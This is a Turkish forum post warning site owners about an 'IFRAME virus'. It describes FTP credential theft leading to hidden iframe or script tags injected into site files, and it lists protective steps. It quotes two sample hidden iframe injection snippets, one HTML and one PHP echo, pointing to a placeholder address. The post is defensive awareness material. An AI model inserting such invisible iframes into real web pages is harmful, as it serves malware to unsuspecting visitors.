Web sitelerini tehdit eden IFRAME Virüsü!

Konu 'Bilişim Teknolojileri' bölümünde Red tarafından paylaşıldı.

  1. Red

    Red Forumdan Uzaklaştırıldı

    Katılım:
    15 Kasım 2009
    Mesajlar:
    816
    Beğenileri:
    1.033
    Ödül Puanları:
    0

    [​IMG]
    Web sitelerini tehdit eden IFRAME Virüsü! ​
    Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.

    IFRAME Virüsü nedir?

    Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

    Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

    Nasıl bulaşır :

    1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.

    2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

    IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

    IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.
    IFRAME kod örnekleri:
    <IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>
    echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>";

    Korunmak için yapmanız gerekenler:
    1. FTP şifrenizi değiştiriniz.
    2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
    3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
    4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.
    a_y_t_ü_l bunu beğendi.
  2. mutluprenses

    mutluprenses Üye

    Katılım:
    22 Ekim 2009
    Mesajlar:
    386
    Beğenileri:
    58
    Ödül Puanları:
    0
    Bilgilendirdigin için teşekkürler..

Sayfayı Paylaş